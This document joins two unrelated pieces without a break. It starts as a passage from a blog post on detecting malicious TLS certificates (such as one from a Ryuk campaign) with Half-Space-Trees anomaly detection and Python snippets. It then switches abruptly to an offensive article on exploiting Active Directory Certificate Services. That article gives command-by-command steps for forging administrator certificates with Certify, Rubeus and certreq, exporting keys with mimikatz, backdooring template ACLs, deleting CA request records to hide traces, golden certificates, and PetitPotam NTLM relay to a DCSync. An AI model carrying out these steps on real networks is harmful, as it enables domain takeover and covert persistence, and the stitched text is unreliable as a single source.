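    # an equals sign, so values containing commas survive intact.
    pattern = r",\s*(?=(?:%s)=)" % "|".join(ATTR_KEYS)
    attrs = {}
    for part in re.split(pattern, dn):
        key, _, value = part.partition("=")
        attrs[key.strip()] = value
    return attrs
```

Applied to the Ryuk example above, this yields an empty OU value and `"lol"` as the organization name, ready for feature extraction.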
Note the following characteristics that can be observed in this malicious certificate:
- It is a self-signed certificate, as no CA is present in the Issuer Name.
- The Organization name attribute contains the string “lol”.
- The Organizational Unit attribute is empty.
- A domain name is present in the Common Name (ix, x).
Compare these characteristics to the legitimate certificate used by the fox-it.com domain.
Subject Name:
C=GB, L=Manchester, O=NCC Group PLC, CN=www.nccgroup.com
Issuer Name:
C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K
Example 2. Subject and issuer fields in a TLS certificate used by fox-it.com
Observe the attributes in the Subject and Issuer Name: the Subject Name contains information about the owner of the certificate, while the Issuer Name contains information about the CA.
Using machine learning to identify anomalous certificates
When comparing the legitimate and malicious certificates, the certificate used in the Ryuk ransomware campaign simply "looks weird". If humans can identify that the malicious certificate is peculiar, could machines also learn to classify such a certificate as anomalous? To explore this question, a dataset of "known good" and "known bad" TLS certificates was curated. Using white-box algorithms, such as Random Forest, several features were identified that helped classify malicious certificates. For example, the number of empty attributes had a statistical relationship with how likely the certificate was to be used for malicious activities.

However, it was soon recognized that this approach was problematic: there was a risk of "over-fitting" the algorithm to the training data, a situation in which the algorithm performs well on the training dataset but poorly on real-life data. Especially in a stream of data that evolves over time, such as network data, it is challenging to maintain high detection precision. To be effective, the model needed the ability to pick up new patterns outside the small sample of training data provided; an unsupervised machine learning model that could detect anomalies in real time was required.
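To make the feature idea concrete, here is a minimal sketch (not the production pipeline; the parsing approach and feature names are illustrative assumptions) that derives such features from the subject and issuer strings shown above:

```python
# Illustrative feature extraction from certificate subject/issuer strings.
def parse_dn(dn):
    """Parse a comma-separated DN like 'C=US, O=lol, OU=, CN=x' into (attr, value) pairs."""
    pairs = []
    for part in dn.split(","):
        part = part.strip()
        if "=" in part:
            attr, _, value = part.partition("=")
            pairs.append((attr.strip(), value.strip()))
    return pairs

def certificate_features(subject, issuer):
    s, i = parse_dn(subject), parse_dn(issuer)
    return {
        # Self-signed certificates have identical subject and issuer fields.
        "self_signed": s == i,
        # The number of empty attributes was statistically related to maliciousness.
        "empty_attributes": sum(1 for _, v in s if v == ""),
        # A bare domain in the CN was another characteristic of the Ryuk certificate.
        "cn": dict(s).get("CN", ""),
    }

ryuk = "C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com"
print(certificate_features(ryuk, ryuk))
```

On the Ryuk certificate above, this flags a self-signed certificate with one empty attribute (OU) and a domain name in the CN, the same characteristics listed earlier.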
An isolation-based anomaly detection approach
The Isolation Forest, created by Liu et al. in 2008, was the first isolation-based anomaly detection model (xi). The paper presented an intuitive but powerful idea: anomalous data points are rare, and a property of rarity is that an anomalous data point is easier to isolate from the rest of the data.
From this insight, the proposed algorithm computes how easy it is to isolate an anomaly. It does this by building a tree that splits the data (Visualization 1 includes an example of a tree structure). The more anomalous an observation is, the faster it gets isolated in the tree and the fewer splits are needed. Note that the Isolation Forest is an ensemble method: it builds multiple trees (a forest) and averages the number of splits the trees need to isolate a point (xi).
An advantage of this approach is that, in contrast to density- and distance-based approaches, it requires less computational cost to identify anomalies (xi, xii) while maintaining comparable performance (viii, ix).
Half-Space-Trees: Isolation-based approach for streaming data
In 2011, building on their earlier work, Tan, Ting and Liu created an isolation-based algorithm called Half-Space-Trees (HST) that utilizes incremental learning techniques. HST enables an isolation-based anomaly detection approach to be applied to a stream of continuous data (xiii). The animation below demonstrates how a simple half-space-tree isolates anomalies in the window space with a tree-based structure:
Visualization 1: An example of 2-dimensional data in a window divided by two simple half-space-trees, the visualization is inspired by the original paper.
HST is also an ensemble method: it builds multiple half-space-trees. A single half-space-tree bisects the window (the space) into half-spaces based on the features in the data. Each half-space-tree does this randomly and continues until the configured tree height is reached. The half-space-tree then counts the data points per subspace and assigns each subspace a mass score (represented by the colors).
The subspaces where most data points fall are considered high-mass subspaces, and the subspaces with few or no data points are considered low-mass subspaces. Most data points are expected to fall in high-mass subspaces because they need many more splits (i.e., a higher tree) to be isolated. The sum of the mass across all half-space-trees becomes the final anomaly score of the HST (xiii). Calculating mass is a different approach than counting splits (as the Isolation Forest does), but computing the mass profile recursively remains a simple and fast way to score data points in streaming data (xiii).
Moreover, HST works with two consecutive windows: the reference window and the latest window. HST learns the mass profile in the reference window and uses it as a reference for new incoming data in the latest window. Without going too deeply into the workings of the windows, it is worth mentioning that the reference window is updated every time the latest window fills up: the mass profile of the latest window overwrites that of the reference window, and the latest window is then cleared so new data can come in. By updating its windows this way, HST is robust to evolving streaming data (xiii).
The anomaly scores output by HSTs fall between 0 and 1: the closer the score is to 1, the easier the certificate was to isolate and the more likely it is anomalous. Testing HSTs on our initially collated data convinced us that this was a robust approach to the problem, with the Ryuk ransomware certificate repeatedly identified with an anomaly score of 0.84.
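The mass-profile idea can be sketched in a few lines. This is a toy, single-tree illustration under assumed parameters, not the ensemble HST model itself: a random half-space-tree is built by repeated midpoint bisection, a mass profile is learned from a reference window, and new points are scored by the mass of the subspace they land in:

```python
import random

def build_tree(bounds, depth, rng):
    """Recursively bisect the space: pick a random dimension and split it at its midpoint."""
    if depth == 0:
        return {"mass": 0}
    dim = rng.randrange(len(bounds))
    lo, hi = bounds[dim]
    mid = (lo + hi) / 2.0
    left = list(bounds); left[dim] = (lo, mid)
    right = list(bounds); right[dim] = (mid, hi)
    return {"dim": dim, "split": mid,
            "left": build_tree(left, depth - 1, rng),
            "right": build_tree(right, depth - 1, rng)}

def descend(node, point):
    while "dim" in node:
        node = node["left"] if point[node["dim"]] < node["split"] else node["right"]
    return node

def learn(tree, window):
    """Record the mass profile of the reference window: count points per leaf subspace."""
    for p in window:
        descend(tree, p)["mass"] += 1

def mass_score(tree, point):
    """Points landing in high-mass subspaces are normal; low mass suggests an anomaly."""
    return descend(tree, point)["mass"]

rng = random.Random(7)
tree = build_tree([(0.0, 1.0), (0.0, 1.0)], depth=4, rng=rng)
# Reference window: a dense cluster around (0.2, 0.2).
window = [(0.2 + rng.uniform(-0.05, 0.05), 0.2 + rng.uniform(-0.05, 0.05)) for _ in range(200)]
learn(tree, window)
print(mass_score(tree, (0.2, 0.2)), mass_score(tree, (0.9, 0.9)))
```

With a dense reference cluster around (0.2, 0.2), a point inside the cluster lands in a high-mass subspace while (0.9, 0.9) lands in an empty one, mirroring the high-mass/low-mass intuition described above.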
The importance of feedback loops – going from research to production
As a provider of managed cyber security services, we are fortunate to have a number of close customers who were willing to deploy the model on live network traffic in a controlled setting. Combined with quick feedback from human analysts on the anomaly scores being output, it was possible to optimize the model to ensure that it produced sensible scoring across a wide range of environments. Having established credibility, the model could be deployed more widely. In an example of the economic concept of "network effects", the more environments the model was deployed on, the more its performance improved and the more adaptable it proved to each unique environment in which it operates.
Whilst high anomaly scores do not necessarily indicate malicious behavior, they are a measure of weirdness or novelty. Combining the anomaly scoring obtained from HSTs with other metrics or rules, derived in real-time, it has become possible to classify malicious activity with greater certainty.
Machines can learn to detect suspicious TLS certificates
An unsupervised, incremental anomaly detection model is applied in our security operations centers and is now part of our commercial offerings. We would like to encourage other cyber security defenders to look at the characteristics of TLS certificates to detect malicious activity even when traffic is encrypted. Encryption does not equal invisibility: there is often (meta)data to consider, and it calls for different approaches to hunting for malicious activity. As a data science team in particular, we found Half-Space-Trees to be an effective and fast anomaly detector for streaming network data.
References
[i] NCC Group & Fox-IT. (2021). “Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes.”
https://research.nccgroup.com/2021/06/14/incremental-machine-leaning-by-example-detecting-suspicious-activity-with-zeek-data-streams-river-and-ja3-hashes/
[ii] Van Luijk, R. (2020) “Hunting for beacons.” Fox-IT.
[iii] Van Luijk, R., Postma, A. (2019). "Using Anomaly Detection to Find Malicious Domains." Fox-IT. < https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/ >
[iv] https://protonmail.com/blog/tls-ssl-certificate/
[v] https://attack.mitre.org/techniques/T1608/003/
[vi] Mokbel, M. (2021). “The State of SSL/TLS Certificate Usage in Malware C&C Communications.” Trend Micro.
https://www.trendmicro.com/en_us/research/21/i/analyzing-ssl-tls-certificates-used-by-malware.html
[vii] https://sslbl.abuse.ch/statistics/
[viii] Cooper, D., Santesson, S., Farrell, S., Boeyen, S., Housley, R., and W. Polk. (2008). “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”, RFC 5280, DOI 10.17487/RFC5280.
https://datatracker.ietf.org/doc/html/rfc5280
[ix] https://attack.mitre.org/software/S0446/
[x] Goody, K., Kennelly, J., Shilko, J. Elovitz, S., Bienstock, D. (2020). “Kegtap and SingleMalt with Ransomware Chaser.” FireEye.
https://www.fireeye.com/blog/jp-threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
[xi] Liu, F. T. , Ting, K. M. & Zhou, Z. (2008). “Isolation Forest”. Eighth IEEE International Conference on Data Mining, pp. 413-422, doi: 10.1109/ICDM.2008.17.
https://ieeexplore.ieee.org/document/4781136
[xii] Togbe, M.U., Chabchoub, Y., Boly, A., Barry, M., Chiky, R., & Bahri, M. (2021). “Anomalies Detection Using Isolation in Concept-Drifting Data Streams.” Comput., 10, 13.
https://www.mdpi.com/2073-431X/10/1/13
[xiii] Tan, S. Ting, K. & Liu, F. (2011). “Fast Anomaly Detection for Streaming Data.” 1511-1516. 10.5591/978-1-57735-516-8/IJCAI11-254.
https://www.ijcai.org/Proceedings/11/Papers/254.pdf
ADCS Attack Surface Discovery and Exploitation
Author: Imanfeng
0x00 Introduction
At Black Hat 2021, SpecterOps released a white paper on exploiting Active Directory Certificate Services. Although ADCS is not installed by default, it is widely deployed in large enterprise domains. Drawing on real engagements, this article describes how ADCS techniques can be used to take over the domain controller in a domain environment, which object ACLs are useful for persistence, and covers ADCS infrastructure, attack surface, and post-exploitation.
0x01 Technical Background
1. Certificate Services
PKI (Public Key Infrastructure)
In a PKI (public key infrastructure), a digital certificate binds the public key of a key pair to the identity of its owner. To prove the identity presented in a digital certificate, the owner responds to a challenge using the private key, which only the owner can access.
Microsoft provides a public key infrastructure (PKI) solution fully integrated into the Windows ecosystem for public key encryption, identity management, certificate distribution, certificate revocation, and certificate management. Once enabled, it identifies the users who enroll certificates so they can later be authenticated or have their certificates revoked: this is Active Directory Certificate Services (ADCS).
ADCS Key Terms
- Root Certification Authority: Certificates are based on a chain of trust; the first certification authority installed becomes the root CA, the starting point of the chain of trust.
- Subordinate CA: A child node in the chain of trust, usually one level below the root CA.
- Issuing CA: A subordinate CA that issues certificates to endpoints (e.g. users, servers, and clients); not every subordinate CA has to be an issuing CA.
- Standalone CA: Usually defined as a CA running on a server that is not joined to a domain.
- Enterprise CA: Usually defined as a CA joined to a domain and integrated with Active Directory Domain Services.
- Digital Certificate: Electronic proof of a user's identity, issued by a Certificate Authority (usually following the X.509 standard).
- AIA (Authority Information Access): Applied to certificates issued by a CA; points to the location of the certificate's issuer to guide revocation checking for that certificate.
- CDP (CRL Distribution Point): Contains information about the location of the CRL, such as a URL (web server) or an LDAP path (Active Directory).
- CRL (Certificate Revocation List): A list of certificates that have been revoked; clients use the CRL to verify whether a presented certificate is still valid.
ADCS Service Architecture
Microsoft's reference deployment of a two-tier PKI environment for ADCS looks like this:
ORCA1: first, a standalone offline root CA is deployed as a local administrator; the AIA and CRL are configured, and the root CA certificate and CRL file are exported.
- Because the root CA certificate must be embedded in every device that validates certificates, the root CA is usually network-isolated from clients or powered off, and kept out of the domain, for security reasons. If the root CA is compromised through administrator error or an attack, the root CA certificate in every embedded device must be replaced, which is extremely costly.
- To validate certificates issued by the root CA, CRL checking must be available to all endpoints; for this, a web server is installed on the subordinate CA (APP1) to host the validation content. The root CA machine is used very rarely, only when adding another subordinate/issuing CA, renewing the CA, or changing the CRL.
APP1: the subordinate CA used for endpoint enrollment, typically with the following key configuration:
- The root CA certificate is placed in the Active Directory configuration container, which lets domain client machines trust the root CA certificate automatically, with no need to distribute it via group policy.
- After requesting APP1's CA certificate on the offline ORCA1, the root CA certificate and CRL file are carried over on removable media into APP1's local store, so that APP1 directly trusts the root CA certificate and root CA CRL.
- A web server is deployed to distribute certificates and CRLs, and the CDP and AIA are configured.
LDAP Attributes
ADCS defines its related attributes in the LDAP container CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
; some of them were mentioned above.
Certificate templates
Most of the ADCS attack surface is concentrated in certificate templates, stored as CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
with objectClass pKICertificateTemplate
. A certificate template's fields include:
- General settings: the certificate's validity period
- Request handling: the certificate's purpose and whether the private key can be exported
- Cryptography: the cryptographic service provider (CSP) to use and the minimum key size
- Extensions: the list of X509v3 extensions to include in the certificate
- Subject name: either supplied by the user in the request, or derived from the identity of the domain principal requesting the certificate
- Issuance requirements: whether "CA certificate manager" approval is required before the certificate request is granted
- Security descriptor: the certificate template's ACL, including the extended rights required to enroll for the template
Issuing a certificate template requires first configuring the template in certtmpl.msc
on the CA and then publishing it in certsrv.msc
. In Extensions, the certificate template object's EKU (pKIExtendedKeyUsage) attribute holds an array of the OIDs (Object Identifiers) enabled in the template.
These custom application policies (EKU OIDs) determine what the certificate can be used for; only the following OIDs allow a certificate to be used for Kerberos authentication:
Description | OID |
---|---|
Client Authentication | 1.3.6.1.5.5.7.3.2 |
PKINIT Client Authentication | 1.3.6.1.5.2.3.4 |
Smart Card Logon | 1.3.6.1.4.1.311.20.2.2 |
Any Purpose | 2.5.29.37.0 |
SubCA | (no EKUs) |
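The check implied by the table can be expressed as a small helper (an illustrative sketch; the function name and list handling are assumptions, while the OIDs come from the table above):

```python
# OIDs from the table above that make a certificate usable for Kerberos
# authentication; an empty EKU list (the SubCA case) also qualifies.
AUTH_EKU_OIDS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

def enables_kerberos_auth(pki_extended_key_usage):
    """Return True if a template's EKU list allows Kerberos authentication."""
    if not pki_extended_key_usage:  # no EKUs at all behaves like a SubCA certificate
        return True
    return any(oid in AUTH_EKU_OIDS for oid in pki_extended_key_usage)

print(enables_kerberos_auth(["1.3.6.1.5.5.7.3.2"]))  # Client Authentication
print(enables_kerberos_auth(["1.3.6.1.5.5.7.3.1"]))  # Server Authentication only
```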
Enterprise NTAuth store
NtAuthCertificates contains the certificate list of all CAs; a CA not in this list cannot process requests for user authentication certificates.
To publish/add a certificate to NTAuth:
certutil -dspublish -f IssuingCaFileName.cer NTAuthCA
To view all certificates in NTAuth:
certutil -viewstore -enterprise NTAuth
To delete a certificate from NTAuth:
certutil -viewdelstore -enterprise NTAuth
Domain-joined machines keep a cached copy in the registry:
HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates
When the "certificate auto-enrollment" group policy is enabled, the local cache is only updated when group policy refreshes.
Certification Authorities & AIA
The Certification Authorities container corresponds to the root CA's certificate store. When a new issuing CA is installed, its certificate is automatically placed in the AIA container.
All certificates from these containers are likewise propagated to every network-connected client as part of group policy processing; if synchronization breaks, KDC authentication throws a KDC_ERR_PADATA_TYPE_NOSUPP
error.
Certificate Revocation List
As mentioned in the PKI service architecture section, the certificate revocation list (CRL) is a list of revoked certificates published by the CA that issued them; comparing a certificate against the CRL is one way to determine whether the certificate is still valid.
CN=<CA name>,CN=<ADCS server>,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
Certificates are usually identified by serial number; in addition to the serial numbers of revoked certificates, the CRL records each certificate's revocation reason and revocation time.
2. Certificate Enrollment
Certificate Enrollment Flow
The certificate enrollment flow in ADCS roughly works as follows:
- The client creates a public/private key pair;
- The public key is placed in a certificate signing request (CSR) message together with other information (such as the certificate subject and the certificate template name), and the CSR is signed with the private key;
- The CA first checks whether the user is allowed to request certificates, whether the certificate template exists, and whether the request content matches the certificate template;
- If the checks pass, the CA generates a certificate containing the client's public key and signs it with its own private key;
- The signed certificate can then be viewed and used.
Enrollment Methods
1. Certificate Authority Web Enrollment
If Certificate Authority Web Enrollment was selected when the CA was deployed, certificates can be requested at http://CA-Computer/certsrv
after authenticating.
2. Client GUI enrollment
Domain machines can request certificates through the certmgr.msc
(user certificates) and certlm.msc
(computer certificates) GUIs.
3. Command-line enrollment
Domain machines can request certificates with certreq.exe
or the PowerShell Get-Certificate
cmdlet; usage examples appear later.
4. DCOM
DCOM-based certificate enrollment follows the MS-WCCE protocol; most C#, Python, and PowerShell ADCS tooling requests certificates via WCCE.
Enrollment Permissions
Access control in Active Directory is based on the access control model, which has two basic parts:
- An access token, which contains information about the logged-on user
- A security descriptor, which contains the security information protecting a securable object
ADCS defines enrollment rights (which principals may request certificates) with two sets of security settings: one on the certificate template AD object, and one on the enterprise CA itself.
On the issuing CA, certtmpl.msc
lists all certificate templates, and the Security tab shows each template's user access rights.
certsrv.msc
on the issuing CA shows the CA's own access rights for users.
0x02 Certificate Usage
1. Certificate Authentication
Kerberos Authentication
Kerberos is the primary authentication protocol in a domain environment; its flow is roughly:
- AS_REQ: the client authenticates to the KDC with its client_hash and a timestamp;
- AS_REP: the KDC checks the client_hash and timestamp and, if correct, returns to the client a TGT encrypted with the krbtgt hash, together with the PAC and related information;
- TGS_REQ: the client requests a TGS ticket from the KDC, presenting its TGT and the requested SPN;
- TGS_REP: if the KDC recognizes the SPN, it returns to the client an ST encrypted with the service account's NTLM hash;
- AP_REQ: the client uses the ST to request the corresponding service, passing the PAC to the service for checking. The service reads the user's SID, groups and so on from the PAC, compares them against its own ACL, and returns an appropriate RPC status code if the check fails;
- AP_REP: the service validates the AP-REQ and, on success, sends an AP-REP; the client and server then verify each other's identity by encrypting and decrypting with the session key generated along the way.
PKINIT Authentication
RFC 4556 defines PKINIT as an extension protocol for Kerberos that uses X.509 certificates to obtain Kerberos tickets (TGTs).
PKINIT differs from plain Kerberos mainly in the AS exchange:
- PKINIT AS_REQ: the request contains the certificate and is signed with the private key. The KDC verifies the digital signature with the public key and, once confirmed, returns a TGT encrypted with the certificate's public key; the message is signed with the KDC's private key;
- PKINIT AS_REP: the client verifies the signature with the KDC's public key, then decrypts with the certificate's private key and obtains the TGT.
Detailed protocol flow specification: http://pike.lysator.liu.se/docs/ietf/rfc/45/rfc4556.xml
NTLM Credentials
In 2016, the ability to obtain NTLM credentials via a certificate was integrated into kekeo and mimikatz; the core insight is that when a certificate is used for PKCA extension-protocol authentication, the returned PAC contains the NTLM credential.
Even if the user's password is changed, the NTLM hash can be obtained at any time with the certificate. For a certificate to be usable for Kerberos authentication, the following conditions must be met:
1. Certificate template OID
As mentioned above, only certificates whose application policies (OIDs) include Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or SubCA can serve as PKINIT authentication credentials.
2. Certificate request rights
- The user has the right to request certificates from the CA;
- The user has enrollment rights on the certificate template.
2. Obtaining Certificates
Exporting machine certificates
Export via the certlm.msc
GUI or with certutil.exe
.
If the private key is marked as non-exportable, Mimikatz's crypto::capi
command can patch CAPI in the current process, so that the Crypto APIs will export the certificate together with its private key.
Exporting user certificates
Export user certificates via the certmgr.msc
GUI or with certutil.exe
.
If the private key is restricted, crypto::capi
can likewise be tried to export the certificate.
Searching for certificates on disk
In practice, certificate and private key files are often already sitting in folders and need no export; the main file extensions are:
Extension | Description |
---|---|
.pfx\ .p12\ .pkcs12 | Contains both public and private keys, usually password-protected |
.pem | Base64-encoded certificate and private key; can be converted with openssl |
.key | Contains only the private key |
.crt\ .cer | Contains only the certificate |
.csr | Certificate signing request file; contains no keys |
.jks\ .keystore\ .keys | May contain certificates and private keys used by Java applications |
Open-source tools or custom tooling can be used to search for these file extensions as needed.
0x03 Certificate Abuse
This section covers ADCS abuse, from certificate template misuse through to persistence.
1. Certificate Templates
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT abuse
This misconfiguration is the most common one in enterprise ADCS. The conditions to be met are:
- The issuing CA grants low-privileged users request rights (default)
- CA manager approval is disabled in the template (default)
- No authorized signatures are required in the template (default)
- The template allows low-privileged users to enroll
- The template defines an authentication-enabled EKU
- The certificate template allows the requester to specify a subjectAltName in the CSR
If the conditions above are met, an attacker can declare an arbitrary identity through the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
field when requesting a certificate, and thereby obtain a certificate for the forged identity. Certify is the ADCS exploitation tool that accompanies the white paper.
Certify.exe find /vulnerable
Use certutil.exe -TCAInfo
to check the CA's status and the current user's request rights.
Use Certify's altname option to forge the administrator identity and try to obtain a certificate:
Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:"ESC1" /altname:administrator
Once the request is approved, a PEM certificate file containing the public and private keys is returned; convert the format with openssl:
/usr/bin/openssl pkcs12 -in ~/cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ~/cert.pfx
Builds of Rubeus after 20.11 support PKINIT certificates; use cert.pfx to request a TGT as administrator and successfully obtain administrator's ticket:
Rubeus4.exe asktgt /user:Administrator /certificate:cert.pfx /password:123456 /outfile:cert.kribi /ptt
Any EKU OR no EKU
The first four conditions are the same as for the previous technique, and the certificate is a user rather than a machine certificate; the main difference lies in the EKU:
- The issuing CA grants low-privileged users request rights (default)
- CA manager approval is disabled in the template (default)
- No authorized signatures are required in the template (default)
- The template allows low-privileged users to enroll
- The certificate template defines no EKU or the Any Purpose EKU
Use certutil.exe
to check whether the template's pKIExtendedKeyUsage
field is empty:
certutil -v -dstemplate
Certify successfully locates the malicious template.
This technique cannot directly forge a user through Kerberos authentication. Any Purpose (OID 2.5.29.37.0) allows the certificate to be used for any purpose, including client authentication; if no EKU is specified, i.e. pKIExtendedKeyUsage is empty, the certificate is equivalent to a subordinate CA certificate and can be used in any situation, including issuing certificates to other users.
As noted earlier, a CA certificate that is not in NtAuthCertificates cannot issue certificates for authentication purposes, so this technique cannot directly impersonate a user. It can, however, be used to sign certificates for other applications, for example ADFS, a service Microsoft ships as a standard Windows Server role that provides web sign-in using existing Active Directory credentials; interested readers can build a lab and try it out.
Enrollment agent certificate abuse
The CA provides some basic certificate templates, but the standard CA templates cannot be used directly; they must first be duplicated and configured. For convenience, some enterprises configure their servers so that administrators or enrollment agents can enroll for certain templates directly on behalf of other users and obtain usable certificates.
This functionality requires two template configurations:
- A certificate template that issues the "enrollment agent" certificate
- A certificate template that permits enrollment on behalf of other users
Template one issues the "enrollment agent" certificate:
- The issuing CA grants low-privileged users request rights (default)
- CA manager approval is disabled in the template (default)
- No authorized signatures are required in the template (default)
- The template allows low-privileged users to enroll
- The certificate template defines the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1)
Template two allows using the "enrollment agent" certificate to request authentication certificates on behalf of other users:
- The issuing CA grants low-privileged users request rights (default)
- CA manager approval is disabled in the template (default)
- No authorized signatures are required in the template (default)
- The template allows low-privileged users to enroll
- The template defines an authentication-enabled EKU
- The template schema is version 1, or greater than 2 with an application policy issuance requirement of the Certificate Request Agent EKU
- No enrollment agent restrictions are configured on the CA (default)
Request an enrollment agent certificate and export it together with its private key as esc3_1.pfx.
Use Certify with esc3_1.pfx to request the authentication certificate esc3_2.pfx on behalf of administrator; the resulting certificate can likewise be used for pass-the-ticket:
Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:ESC3_2 /onbehalfof:administrator /enrollcert:esc3_1.pfx /enrollcertpw:123456
The certificate is issued to administrator.
EDITF_ATTRIBUTESUBJECTALTNAME2 abuse
For business reasons, some enterprises set EDITF_ATTRIBUTESUBJECTALTNAME2
on the issuing CA to enable SAN (subject alternative names), allowing users to declare their own identity when requesting a certificate. For example, in the CBA for Azure AD scenario, certificates are distributed to mobile devices through NDES, and users declare their identity with an RFC name or principal name in the SAN extension.
Exploitation is then the same as the first technique and can likewise forge identities; the difference is that one uses a certificate attribute while the other uses a certificate extension.
- The enterprise CA grants low-privileged users request rights (default)
- CA manager approval is disabled in the template (default)
- No authorized signatures are required in the template (default)
- The CA has EDITF_ATTRIBUTESUBJECTALTNAME2 set
Check via the remote registry whether the CA has the SAN flag enabled:
certutil -config "CA01.corp.qihoo.cn\corp-CA01-CA" -getreg "policy\EditFlags"
Manually create the exploit certificate request:
certreq -new usercert.inf certrequest.req
#usercert.inf
[NewRequest]
KeyLength=2048
KeySpec=1
RequestType = PKCS10
Exportable = TRUE
ExportableEncrypted = TRUE
[RequestAttributes]
CertificateTemplate=USER
Submit the request to obtain a .cer file containing the public key; the other fields are covered in the official documentation:
certreq -submit -config "CA01.corp.qihoo.cn\corp-CA01-CA" -attrib "SAN:[email protected]" certrequest.req certrequest.cer
Import the .cer into the machine, export it together with the private key as a .pfx, and pass-the-ticket authentication again succeeds.
2. Access Rights
As mentioned earlier, certificate templates and certification authorities are securable objects in AD, which means security descriptors can specify which principals have which rights over them; see the ACL documentation for details.
In the corresponding Security settings, user rights can be configured; we care about five rights:
Right | Description |
---|---|
Owner | The object's owner; can edit any property |
Full Control | Full control over the object; can edit any property |
WriteOwner | Allows the principal to modify the owner in the object's security descriptor |
WriteDacl | Can modify the access control |
WriteProperty | Can edit any property |
Template ACL misconfiguration
For example, if we have already taken over the whole domain and want to use a certificate template for persistence, we can add ACEs to a harmless, normal template:
- NT AUTHORITY\Authenticated Users -> WriteDacl
- NT AUTHORITY\Authenticated Users -> WriteProperty
Later, when we regain any user's credentials through password spraying or similar means, we can turn that harmless template into an exploitable privilege-escalation template:
- msPKI-Certificates-Name-Flag -edit-> ENROLLEE_SUPPLIES_SUBJECT (WriteProperty)
- msPKI-Certificate-Application-Policy -add-> Server Authentication (WriteProperty)
- mspki-enrollment-flag -edit-> AUTO_ENROLLMENT (WriteProperty)
- Enrollment Rights -add-> Control User (WriteDacl)
Then use the malicious template for CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT privilege escalation to obtain administrator's certificate credential and pass-the-ticket. Unlike Certify, certi can be used from outside the domain.
PKI ACL misconfiguration
If a low-privileged attacker can control CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
, the attacker directly controls the PKI system (the certificate templates container, the certification authorities container, the NTAuthCertificates object, the enrollment services container, and so on).
Grant the CORP\zhangsan user GenericAll rights over CN=Public Key Services,CN=Services,CN=Configuration
.
We can then abuse this permission to create a new malicious certificate template and apply the domain privilege-escalation methods described earlier.
CA ACL misconfiguration
The CA itself has a set of security rights used for privilege management.
We mainly care about the ManageCA and ManageCertificates rights:
Right | Description |
---|---|
Read | Read the CA |
ManageCA | CA administrator |
Issue and manage certificates | Certificate manager |
Request certificates | Request certificates; granted by default |
Abuse one: hiding CA request records
After obtaining domain admin rights or PKI operation rights, create a malicious certificate template.
Use the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT technique to obtain administrator's pfx certificate for persistence (the certificate cannot be used if the user account is in an abnormal state).
For stealth, we can delete the template and then have zhangsan, who holds the ManageCA right, call the COM interface ICertAdminD2::DeleteRow
to delete the traces of the certificate request from the CA database.
Operations staff then cannot see our certificate request in the certificate console and cannot revoke the certificate. As long as the administrator account and the certificate have not expired, the certificate can be used indefinitely, even if the user's password is changed.
Abuse two: modifying CA properties for certificate privilege escalation
With the ManageCA right, call ICertAdminD2::SetConfigEntry
to modify the CA's configuration data, for example flipping the boolean Config_CA_Accept_Request_Attributes_SAN
to enable the CA's EDITF_ATTRIBUTESUBJECTALTNAME2
.
The EDITF_ATTRIBUTESUBJECTALTNAME2 abuse described earlier can then be used to take control of the domain.
Abuse three: approving our own certificate enrollment
When configuring certificate templates, some operations staff set the template's issuance requirement to CA certificate manager approval for safety, and an administrator then confirms requests in certsrv.msc
.
With the ManageCertificates right, call ICertAdminD::ResubmitRequest
to approve and release the pending abuse certificate request.
3. Other Techniques
Golden Certificates
A stolen certification authority (CA) certificate and its private key can be used to forge certificates for arbitrary users, and those users can authenticate to Active Directory, because the only key needed to sign issued certificates is the CA's private key.
After compromising the CA server, extract any CA certificate private key that is not hardware-protected using mimikatz or the SharpDPAPI project:
SharpDPAPI4.exe certificates /machine
After converting the format with openssl, use ForgeCert or pyForgeCert to construct the certificate; a CA certificate with its private key is thus a "golden certificate".
NTLM Relay to ADCS HTTP Endpoints
This technique exists because the HTTP certificate enrollment interfaces are vulnerable to NTLM relay attacks. There are many articles on NTLM abuse (e.g. CVE-2018-8581, CVE-2019-1040, PrinterBug), so it is not covered again here.
PetitPotam can make a designated server in the domain authenticate to a chosen target; against older versions (below Windows Server 2016) it can be triggered anonymously.
By calling MS-EFSRPC
functions against the domain controller, the DC is made to authenticate to our listener, and we relay the captured NTLM authentication to the ADCS web enrollment page.
Enrolling a certificate with the web service using the DC machine account's NTLM credential yields the DC machine account's Base64-encoded certificate.
Use kekeo to ask for a TGT; this yields DC$ privileges for a DCSync.
0x04 Closing Notes
ADCS techniques are very convenient for privilege escalation and persistence in real-world engagements. Defensive measures against ADCS are covered in detail in the white paper and are not repeated here.
Some of the mitigations reference Microsoft's three-tier administrative model:
The core idea is that each class of user may only access the corresponding class of assets; access downward is denied, and access upward raises an alert. The CA and ADCS servers' local administrators groups, the PKI, and the owners of certificate templates should therefore all be in Tier 0.
Finally, Lingteng Lab is continuously hiring senior offensive-security experts and senior security researchers; if interested, send your resume to g-linton-lab[AT]360.cn
0x05 References
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
